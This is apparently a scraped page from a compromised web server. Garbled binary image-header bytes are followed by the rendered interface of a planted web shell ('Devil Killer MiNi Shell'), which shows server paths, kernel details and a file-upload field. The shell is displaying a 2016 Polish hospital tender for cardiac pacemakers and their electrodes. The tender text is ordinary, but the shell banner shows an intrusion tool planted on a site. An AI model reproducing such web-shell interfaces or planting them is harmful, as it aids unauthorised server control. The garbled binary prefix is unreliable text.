JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160302/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160302/21865-N-2016.html

<p class="kh_header"><b>Włocławek: Dostawa stymulatorów serca, post. II</b><br>
<b>Numer ogłoszenia: 21865 - 2016; data zamieszczenia: 02.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny we Włocławku , Ul. Wieniecka 49, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 54 412 94 13, faks 54 412 94 13.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://szpital.wloclawek.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa stymulatorów serca, post. II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Ogólny opis przedmiotu zamówienia:
Przedmiotem zamówienia jest dostawa stymulatorów serca wraz z kompletem elektrod i introducerów dla Wojewódzkiego Szpitala Specjalistycznego im. błogosławionego księdza Jerzego Popiełuszki we Włocławku.

II. Termin wykonania zamówienia:
Planowany termin realizacji zamówienia: sukcesywnie przez okres 12 miesięcy od dnia zawarcia umowy.

III. Szczegółowy opis przedmiotu zamówienia:

1. Zadanie 1
Przedmiotem zamówienia jest dostawa 30 stymulatorów SSIR wraz z kompletem elektrod i introducerów, w ramach składu konsygnacyjnego, zgodnie z poniższym opisem:
Parametry wymagane dla stymulatorów SSIR z automatycznymi funkcjami stymulacji i wyczuwania:
1) Tryb stymulacji VVI, VVT, VOO, AAT, AAI, AOO, OFF
2) Częstotliwość stymulacji 30...(5)...200 ppm
3) Czułość kanału komorowego (mV): <0,5 - 7,5>
4) Amplituda impulsu komorowego (V): <0,2 - 7,5>
5) Czas trwania impulsu (ms): <0,1 - 1,5>
6) Algorytm automatycznie dostosowujący energię impulsu do indywidualnych potrzeb pacjenta typu beat to beat w komorze
7) Automatyczna możliwość przełączania polarności w przypadku przekroczenia zakresu impedancji elektrod
8) Automatyczna czułość w komorze
9) Zapis zaburzeń rytmu serca
10) Dwa dodatkowe typy histerez oprócz histerezy rytmu
11) W pełni automatyczny follow up
12) Waga stymulatora do 25 g
13) Histogramy rytmu komór
14) Dokładność pomiaru progu stymulacji (mV) co 0,1
15) Gniazda elektrod IS-1
16) Żywotność baterii przy nastawach nominalnych min. 12 lat
Parametry wymagane dla elektrod do stymulatorów SSIR:
1) Łącznik IS-1
2) Kształt prosty i J
3) Bipolar
4) Osłona silikonowa
5) Pasywna i aktywna fiksacja (do wyboru)

UWAGI:
1) Wykonawca zagwarantuje dostawy towaru w ramach składu konsygnacyjnego zorganizowanego w siedzibie Zamawiającego, na zasadach opisanych w załączniku nr 8 do SIWZ.
2) Ilość towaru składowana w składzie konsygnacyjnym: 5 zestawów (w skład jednego zestawu wchodzi stymulator wraz z kompletem elektrod i introducerów wymaganych do wykonania jednego zabiegu).
3) Elektrody pasywne / aktywne do wyboru.
4) Wkłucia naczyniowe typ rozrywany z zapewnieniem optymalnej średnicy oferowanego wkłucia do proponowanych elektrod.
5) W ramach zamówienia Wykonawca wydzierżawi - na cały okres obowiązywania umowy - Zamawiającemu następujące urządzenia:
a) najnowszy model programatora z funkcją implantacyjną do sali wszczepień,
b) najnowszy model programatora do poradni kontroli stymulatorów.
6) W ramach dzierżawy Wykonawca zapewni stały dostęp do minimum jednego kompletu kabli niejałowych oraz 4 kompletów jałowych kabli implantacyjnych do programatora implantacyjnego.
7) W ramach dzierżawy Wykonawca zapewni stały dostęp do minimum jednego kompletu kabli do programatora, który znajdować się będzie w poradni kontroli stymulatorów.
8) Dostęp, o którym mowa w pkt 6 i 7, zostanie zapewniony w siedzibie Zamawiającego w miejscu przechowywania urządzeń.
9) Cena kompletów kabli, które zużywać będzie Zamawiający, winna być ujęta w cenie dzierżawy urządzeń.
10) W ramach dzierżawy Wykonawca zapewni również serwis programatorów (przeglądy, upgrade, naprawa z zapewnieniem urządzenia zastępczego na czas trwania naprawy) oraz dostawę materiałów eksploatacyjnych do tych urządzeń, w tym papier do drukarek programatorów - w ilościach niezbędnych do bieżącej pracy.
11) Cena towarów wymienionych w pkt 10 winna być ujęta w cenie dzierżawy urządzeń.
12) W ramach dostawy elektrod Wykonawca zapewni dostępność w składzie konsygnacyjnym co najmniej 2 zestawów jałowych śrubokrętów oraz co najmniej 2 zestawów jałowych kapturów elektrodowych. Cena udostępnienia materiałów, o których mowa w zdaniu pierwszym, winna być ujęta w cenie zestawu (poz. 1 załącznika nr 2 do SIWZ).
13) Stymulatory wraz z kompletami elektrod i inducerów muszą być wyrobami medycznymi dopuszczonymi do obrotu i do używania zgodnie z  ustawą z dnia 20 maja 2010 r. o wyrobach medycznych (t.j. Dz. U. z 2015 r., poz. 876).

2. Zadanie 2
Przedmiotem zamówienia jest dostawa 10 stymulatorów SSIR pro MRI wraz z kompletem elektrod i introducerów, w ramach składu konsygnacyjnego, zgodnie z poniższym opisem:
Parametry wymagane dla stymulatorów SSIR pro MRI z automatycznymi funkcjami stymulacji i wyczuwania:
STYMULATOR SSIR PRO MRI Z AUTOMATYCZNYMI FUNKCJAMI STYMULACJI I WYCZUWANIA
1) Tryb stymulacji VVI, VVT, VOO, AAT, AAI, AOO, OFF
2) Częstotliwość stymulacji 30...(5)...200 ppm
3) Czułość kanału komorowego (mV): <0,5 - 7,5>
4) Amplituda impulsu komorowego (V): <0,2 - 7,5>
5) Czas trwania impulsu (ms): <0,1 - 1,5>
6) Algorytm automatycznie dostosowujący energię impulsu do indywidualnych potrzeb pacjenta typu beat to beat w komorze
7) Automatyczna możliwość przełączania polarności w przypadku przekroczenia zakresu impedancji elektrod
8) Automatyczna czułość w komorze
9) Zapis zaburzeń rytmu serca
10) Dwa dodatkowe typy histerez oprócz histerezy rytmu
11) W pełni automatyczny follow up
12) Waga stymulatora do 25 g
13) Histogramy rytmu komór
14) Dokładność pomiaru progu stymulacji (mV) co 0,1
15) Gniazda elektrod IS-1
16) Żywotność baterii przy nastawach nominalnych min. 12 lat
17) Możliwość wykonania badania MRI 1,5 T Full body scan i 3,0 T z ExZ
Parametry wymagane dla elektrod do stymulatorów SSIR pro MRI:
1) Łącznik IS-1
2) Kształt prosty i J
3) Bipolar
4) Osłona silikonowa
5) Pasywna i aktywna fiksacja (do wyboru)

UWAGI:
1) Wykonawca zagwarantuje dostawy towaru w ramach składu konsygnacyjnego zorganizowanego w siedzibie Zamawiającego, na zasadach opisanych w załączniku nr 8 do SIWZ.
2) Ilość towaru składowana w składzie konsygnacyjnym: 2 zestawy (w skład jednego zestawu wchodzi stymulator wraz z kompletem elektrod i introducerów wymaganych do wykonania jednego zabiegu).
3) Elektrody pasywne / aktywne do wyboru.
4) Wkłucia naczyniowe typ rozrywany z zapewnieniem optymalnej średnicy oferowanego wkłucia do proponowanych elektrod.
5) W ramach zamówienia Wykonawca wydzierżawi - na cały okres obowiązywania umowy - Zamawiającemu następujące urządzenia:
a) najnowszy model programatora z funkcją implantacyjną do sali wszczepień,
b) najnowszy model programatora do poradni kontroli stymulatorów.
6) W ramach dzierżawy Wykonawca zapewni stały dostęp do minimum jednego kompletu kabli niejałowych oraz 4 kompletów jałowych kabli implantacyjnych do programatora implantacyjnego.
7) W ramach dzierżawy Wykonawca zapewni stały dostęp do minimum jednego kompletu kabli do programatora, który znajdować się będzie w poradni kontroli stymulatorów.
8) Dostęp, o którym mowa w pkt 6 i 7, zostanie zapewniony w siedzibie Zamawiającego w miejscu przechowywania urządzeń.
9) Cena kompletów kabli, które zużywać będzie Zamawiający, winna być ujęta w cenie dzierżawy urządzeń.
10) W ramach dzierżawy Wykonawca zapewni również serwis programatorów (przeglądy, upgrade, naprawa z zapewnieniem urządzenia zastępczego na czas trwania naprawy) oraz dostawę materiałów eksploatacyjnych do tych urządzeń, w tym papier do drukarek programatorów - w ilościach niezbędnych do bieżącej pracy.
11) Cena towarów wymienionych w pkt 10 winna być ujęta w cenie dzierżawy urządzeń.
12) W ramach dostawy elektrod Wykonawca zapewni dostępność w składzie konsygnacyjnym co najmniej 1 zestawu jałowych śrubokrętów oraz co najmniej 1 zestawu jałowych kapturów elektrodowych. Cena udostępnienia materiałów, o których mowa w zdaniu pierwszym, winna być ujęta w cenie zestawu (poz. 1 załącznika nr 2 do SIWZ).
13) Stymulatory wraz z kompletami elektrod i inducerów muszą być wyrobami medycznymi dopuszczonymi do obrotu i do używania zgodnie z  ustawą z dnia 20 maja 2010 r. o wyrobach medycznych (t.j. Dz. U. z 2015 r., poz. 876).

3. Zadanie 3
Przedmiotem zamówienia jest dostawa 90 stymulatorów DDDR dwujamowych wraz z kompletem elektrod i introducerów, w ramach składu konsygnacyjnego, zgodnie z poniższym opisem:
Parametry wymagane dla stymulatorów DDDR dwujamowych:
1) Tryb stymulacji: DDD; DDT
2) Czułość przedsionkowa (mV): <0,5 - 7,5>
3) Czułość komorowa (mV): <0,5 - 7,5>
4) Czas trwania impulsu (ms) dla każdego kanału: <0,1 - 1,5>
5) Amplituda impulsu (V) dla każdego kanału: <0,2 - 7,5>
6) Opóźnienie przedsionkowo-komorowe: <20 - 300>
7) W pełni automatyczny follow up
8) Automatyczna czułość w przedsionku i komorze
9) Waga stymulatora nie większa niż 28 g
10) Algorytm automatycznie dostosowujący energię impulsu do indywidualnych potrzeb pacjenta typu beat to beat w komorze
11) Algorytm automatycznie dostosowujący energię impulsu do indywidualnych potrzeb pacjenta w przedsionku
12) Automatyczna możliwość przełączania polarności w przypadku przekroczenia zakresu impedancji elektrod
13) Histogramy rytmu komór
14) Programowalny parametr Safety Margin
15) Algorytm automatycznie wykrywający polarność elektrod oraz automatycznie aktywujący podstawowe funkcje stymulatora (tj. MS, PMT Protection)
16) Algorytm optymalizujący zarządzanie pamięcią IEGM
17) Możliwość zapamiętania najbardziej istotnych zdarzeń w Holterze
18) Algorytm stabilizujący rytm komór podczas Mode Switching
19) Basic rate w zakresie 30-185 ppm
20) Widoczny w skopii znacznik stopy elektrody aktywnej
21) Autosensing
22) Dwa dodatkowe typy histerez oprócz histerezy rytmu
23) Dane pacjenta w programatorze
24) Gniazda elektrod IS-1
Parametry wymagane dla elektrod stymulujących komorowych RV do stymulatorów DDDR dwujamowych:
1) Gniazda elektrod IS-1
2) Łącznik IS-1
3) Kształt prosty
4) Bipolar
5) Osłona silikonowa
6) Pasywna i aktywna fiksacja (do wyboru)
Parametry wymagane dla elektrod stymulujących przedsionkowych RA do stymulatorów DDDR dwujamowych:
1) Łącznik IS-1
2) Kształt litery J lub prosta
3) Bipolar
4) Uwalniająca steryd
5) Pasywna i aktywna fiksacja (do wyboru)

UWAGI:
1) Wykonawca zagwarantuje dostawy towaru w ramach składu konsygnacyjnego zorganizowanego w siedzibie Zamawiającego, na zasadach opisanych w załączniku nr 8 do SIWZ.
2) Ilość towaru składowana w składzie konsygnacyjnym: 12 zestawów (w skład jednego zestawu wchodzi stymulator wraz z kompletem elektrod i introducerów wymaganych do wykonania jednego zabiegu).
3) Elektrody pasywne / aktywne do wyboru.
4) Wkłucia naczyniowe typ rozrywany z zapewnieniem optymalnej średnicy oferowanego wkłucia do proponowanych elektrod.
5) W ramach zamówienia Wykonawca wydzierżawi - na cały okres obowiązywania umowy - Zamawiającemu następujące urządzenia:
a) najnowszy model programatora z funkcją implantacyjną do sali wszczepień,
b) najnowszy model programatora do poradni kontroli stymulatorów.
6) W ramach dzierżawy Wykonawca zapewni stały dostęp do minimum jednego kompletu kabli niejałowych oraz 4 kompletów jałowych kabli implantacyjnych do programatora implantacyjnego.
7) W ramach dzierżawy Wykonawca zapewni stały dostęp do minimum jednego kompletu kabli do programatora, który znajdować się będzie w poradni kontroli stymulatorów.
8) Dostęp, o którym mowa w pkt 6 i 7, zostanie zapewniony w siedzibie Zamawiającego w miejscu przechowywania urządzeń.
9) Cena kompletów kabli, które zużywać będzie Zamawiający, winna być ujęta w cenie dzierżawy urządzeń.
10) W ramach dzierżawy Wykonawca zapewni również serwis programatorów (przeglądy, upgrade, naprawa z zapewnieniem urządzenia zastępczego na czas trwania naprawy) oraz dostawę materiałów eksploatacyjnych do tych urządzeń, w tym papier do drukarek programatorów - w ilościach niezbędnych do bieżącej pracy.
11) Cena towarów wymienionych w pkt 10 winna być ujęta w cenie dzierżawy urządzeń.
12) W ramach dostawy elektrod Wykonawca zapewni dostępność w składzie konsygnacyjnym co najmniej 5 zestawów jałowych śrubokrętów oraz co najmniej 2 zestawy jałowych kapturów elektrodowych. Cena udostępnienia materiałów, o których mowa w zdaniu pierwszym, winna być ujęta w cenie zestawu (poz. 1 załącznika nr 2 do SIWZ).
13) Stymulatory wraz z kompletami elektrod i inducerów muszą być wyrobami medycznymi dopuszczonymi do obrotu i do używania zgodnie z  ustawą z dnia 20 maja 2010 r. o wyrobach medycznych (t.j. Dz. U. z 2015 r., poz. 876).

4. Zadanie 4
Przedmiotem zamówienia jest dostawa 30 stymulatorów DDDR dwujamowych pro MRI wraz z kompletem elektrod i introducerów, w ramach składu konsygnacyjnego, zgodnie z poniższym opisem:
Parametry wymagane dla stymulatorów DDDR dwujamowych pro MRI:
1) Tryb stymulacji: DDD; DDT
2) Czułość przedsionkowa (mV): <0,5 - 7,5>
3) Czułość komorowa (mV): <0,5 - 7,5>
4) Czas trwania impulsu (ms) dla każdego kanału: <0,1 - 1,5>
5) Amplituda impulsu (V) dla każdego kanału: <0,2 - 7,5>
6) Opóźnienie przedsionkowo-komorowe: <20 - 300>
7) W pełni automatyczny follow up
8) Automatyczna czułość w przedsionku i komorze
9) Waga stymulatora nie większa niż 28 g
10) Algorytm automatycznie dostosowujący energię impulsu do indywidualnych potrzeb pacjenta typu beat to beat w komorze
11) Algorytm automatycznie dostosowujący energię impulsu do indywidualnych potrzeb pacjenta w przedsionku
12) Automatyczna możliwość przełączania polarności w przypadku przekroczenia zakresu impedancji elektrod
13) Histogramy rytmu komór
14) Programowalny parametr Safety Margin
15) Algorytm automatycznie wykrywający polarność elektrod oraz automatycznie aktywujący podstawowe funkcje stymulatora (tj. MS, PMT Protection)
16) Algorytm optymalizujący zarządzanie pamięcią IEGM
17) Możliwość zapamiętania najbardziej istotnych zdarzeń w Holterze
18) Algorytm stabilizujący rytm komór podczas Mode Switching
19) Basic rate w zakresie 30-200 ppm
20) Widoczny w skopii znacznik stopy elektrody aktywnej
21) Automatyczny PVRP
22) Autosensing
23) Dwa dodatkowe typy histerez oprócz histerezy rytmu
24) Dane pacjenta w programatorze
25) Gniazda elektrod IS-1
26) Możliwość przeprowadzenia badania MRI 1,5 T Full body scan i 3,0 ExZ
Parametry wymagane dla elektrod stymulujących komorowych RV do stymulatorów DDDR dwujamowych pro MRI:
1) Gniazda elektrod IS-1
2) Łącznik IS-1
3) Kształt prosty
4) Bipolar
5) Osłona silikonowa
6) Pasywna i aktywna fiksacja (do wyboru)
Parametry wymagane dla elektrod stymulujących przedsionkowych RA do stymulatorów DDDR dwujamowych pro MRI:
1) Łącznik IS-1
2) Kształt litery J lub prosta
3) Bipolar
4) Uwalniająca steryd
5) Pasywna i aktywna fiksacja (do wyboru)

UWAGI:
1) Wykonawca zagwarantuje dostawy towaru w ramach składu konsygnacyjnego zorganizowanego w siedzibie Zamawiającego, na zasadach opisanych w załączniku nr 8 do SIWZ.
2) Ilość towaru składowana w składzie konsygnacyjnym: 2 zestawy (w skład jednego zestawu wchodzi stymulator wraz z kompletem elektrod i introducerów wymaganych do wykonania jednego zabiegu).
3) Elektrody pasywne / aktywne do wyboru.
4) Wkłucia naczyniowe typ rozrywany z zapewnieniem optymalnej średnicy oferowanego wkłucia do proponowanych elektrod.
5) W ramach zamówienia Wykonawca wydzierżawi - na cały okres obowiązywania umowy - Zamawiającemu następujące urządzenia:
a) najnowszy model programatora z funkcją implantacyjną do sali wszczepień,
b) najnowszy model programatora do poradni kontroli stymulatorów.
6) W ramach dzierżawy Wykonawca zapewni stały dostęp do minimum jednego kompletu kabli niejałowych oraz 4 kompletów jałowych kabli implantacyjnych do programatora implantacyjnego.
7) W ramach dzierżawy Wykonawca zapewni stały dostęp do minimum jednego kompletu kabli do programatora, który znajdować się będzie w poradni kontroli stymulatorów.
8) Dostęp, o którym mowa w pkt 6 i 7, zostanie zapewniony w siedzibie Zamawiającego w miejscu przechowywania urządzeń.
9) Cena kompletów kabli, które zużywać będzie Zamawiający, winna być ujęta w cenie dzierżawy urządzeń.
10) W ramach dzierżawy Wykonawca zapewni również serwis programatorów (przeglądy, upgrade, naprawa z zapewnieniem urządzenia zastępczego na czas trwania naprawy) oraz dostawę materiałów eksploatacyjnych do tych urządzeń, w tym papier do drukarek programatorów - w ilościach niezbędnych do bieżącej pracy.
11) Cena towarów wymienionych w pkt 10 winna być ujęta w cenie dzierżawy urządzeń.
12) W ramach dostawy elektrod Wykonawca zapewni dostępność w składzie konsygnacyjnym co najmniej 2 zestawy jałowych śrubokrętów oraz co najmniej 2 zestawy jałowych kapturów elektrodowych. Cena udostępnienia materiałów, o których mowa w zdaniu pierwszym, winna być ujęta w cenie zestawu (poz. 1 załącznika nr 2 do SIWZ).
13) Stymulatory wraz z kompletami elektrod i inducerów muszą być wyrobami medycznymi dopuszczonymi do obrotu i do używania zgodnie z  ustawą z dnia 20 maja 2010 r. o wyrobach medycznych (t.j. Dz. U. z 2015 r., poz. 876).

IV. Informacje dodatkowe:
1) Zamawiający zastrzega, że ilość towaru będącego przedmiotem umowy może ulec zmniejszeniu w trakcie trwania umowy nie więcej niż o 20 % w zależności od bieżących potrzeb Zamawiającego.
2) Wykonawca może powierzyć wykonanie części przedmiotu umowy Podwykonawcom, o ile wskaże tych Podwykonawców i zakres powierzanej im części przedmiotu umowy w Formularzu ofertowym - załączniku nr 1 do SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.15.82.10-7, 33.18.22.00-1, 33.18.22.40-3, 22.99.32.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w niniejszym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań na potwierdzenie spełniania tego warunku udziału w postępowaniu. Oceny spełniania tego warunku udziału w postępowaniu Zamawiający dokonana na podstawie złożonych dokumentów i oświadczeń stosując zasadę: Wykonawca SPEŁNIA bądź NIE SPEŁNIA warunku. Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 uPzp lub którzy złożyli dokumenty, o których mowa w art. 25 ust. 1 uPzp, zawierające błędy do ich uzupełnienia w wyznaczonym terminie, chyba, że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek udziału w postępowaniu Zamawiający uzna Wykonawców, którzy:
1) dla Zadania 1: wykonali, a w przypadku świadczeń okresowych również wykonują, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej 1 dostawę stymulatorów serca o wartości nie mniejszej niż 30.000,00 zł brutto w ramach jednego zamówienia / jednej umowy;
2) dla Zadania 2: wykonali, a w przypadku świadczeń okresowych również wykonują, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej 1 dostawę stymulatorów serca o wartości nie mniejszej niż 10.000,00 zł brutto w ramach jednego zamówienia / jednej umowy,
3) dla Zadania 3: wykonali, a w przypadku świadczeń okresowych również wykonują, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej 1 dostawę stymulatorów serca o wartości nie mniejszej niż 120.000,00 zł brutto w ramach jednego zamówienia / jednej umowy,
4) dla Zadania 4: wykonali, a w przypadku świadczeń okresowych również wykonują, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej 1 dostawę stymulatorów serca o wartości nie mniejszej niż 40.000,00 zł brutto w ramach jednego zamówienia / jednej umowy,
Oceny spełniania tego warunku udziału w postępowaniu Zamawiający dokonana na podstawie złożonych dokumentów i oświadczeń stosując zasadę: Wykonawca SPEŁNIA bądź NIE SPEŁNIA warunku. Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 uPzp lub którzy złożyli dokumenty, o których mowa w art. 25 ust. 1 uPzp, zawierające błędy do ich uzupełnienia w wyznaczonym terminie, chyba, że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
